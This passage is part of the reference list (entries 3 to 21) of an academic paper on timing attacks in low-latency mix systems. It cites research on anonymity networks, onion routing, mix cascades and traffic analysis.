3. O. Berthold, H. Federrath, and M. Kohntopp. Project anonymity and unobservability in the internet. In Proc. Computers Freedom and Privacy, April 2000.
4. O. Berthold, A. Pfitzmann, and R. Standtke. The Disadvantages of Free Mix-
Routes and How to Overcome Them. In Proc. Intl. Workshop on Design Issues in
Anonymity and Unobservability, July 2000.
5. J. Bolot. Characterizing End-to-End Packet Delay and Loss in the Internet. Jour-
nal of High Speed Networks, 2(3), Sept 1993.
6. D. Chaum. Untraceable Electronic Mail, Return Addresses, and Digital Pseudonyms. Communications of the ACM, 24(2):84–88, Feb 1981.
7. W. Dai. PipeNet 1.1, August 1996. http://www.eskimo.com/~weidai/pipenet.txt.
8. R. Dingledine, N. Mathewson, and P. Syverson. Reliable MIX Cascade Networks
through Reputation. In Proc. Financial Cryptography, 2003.
9. J. Douceur. The sybil attack. In Proc. IPTPS, Mar 2002.
10. M. Freedman and R. Morris. Tarzan: A Peer-to-Peer Anonymizing Network Layer.
In Proc. ACM Conference on Computer and Communications Security, Nov 2002.
Timing Attacks in Low-Latency Mix Systems
15
11. S. Gribble. UC Berkeley Home IP HTTP Traces. http://www.acm.org/sigcomm/ITA/, July 1997.
12. M. Jakobsson. Flash mixing. In Proc. Sym. on Principles of Distributed Computing,
May 1999.
13. D. Kesdogan, J. Egner, and R. Buschkes. Stop-and-Go-MIXes providing probabilistic anonymity in an open system. In Proc. Information Hiding, Apr 1998.
14. A. Pfitzmann, B. Pfitzmann, and M. Waidner. ISDN-Mixes: Untraceable Commu-
nication with Very Small Bandwidth Overhead. In Proc. GI/ITG Communication
in Distributed Systems, Feb 1991.
15. C. Rackoff and D. R. Simon. Cryptographic defense against traffic analysis. In
Proc. ACM Sym. on the Theory of Computing, May 1993.
16. M. Reed, P. Syverson, and D. Goldschlag. Anonymous Connections and Onion
Routing. IEEE Journal on Selected Areas in Communications, Special Issue on Copyright and Privacy Protection, 1998.
17. S. Saroiu, P. Krishna Gummadi, and S. Gribble. A Measurement Study of Peer-to-
Peer File Sharing Systems. In Proc. Multimedia Computing and Networking, Jan
2002.
18. A. Serjantov, R. Dingledine, and P. Syverson. From a trickle to a flood: active
attacks on several mix types. In Information Hiding, 2002.
19. P. Syverson, G. Tsudik, M. Reed, and C. Landwehr. Towards an Analysis of Onion
Routing Security. In Workshop on Design Issues in Anonymity and Unobservabil-
ity, July 2000.
20. M. Wright, M. Adler, B.N. Levine, and C. Shields. An Analysis of the Degradation
of Anonymous Protocols. In Proc. ISOC Sym. on Network and Distributed System
Security, Feb 2002.
21. M. Wright, M. Adler, B.N. Levine, and C. Shields. Defending Anonymous Com-
munication Against Passive Logging Attacks. In Proc. IEEE Sym. on Security and
Privacy, May 2003.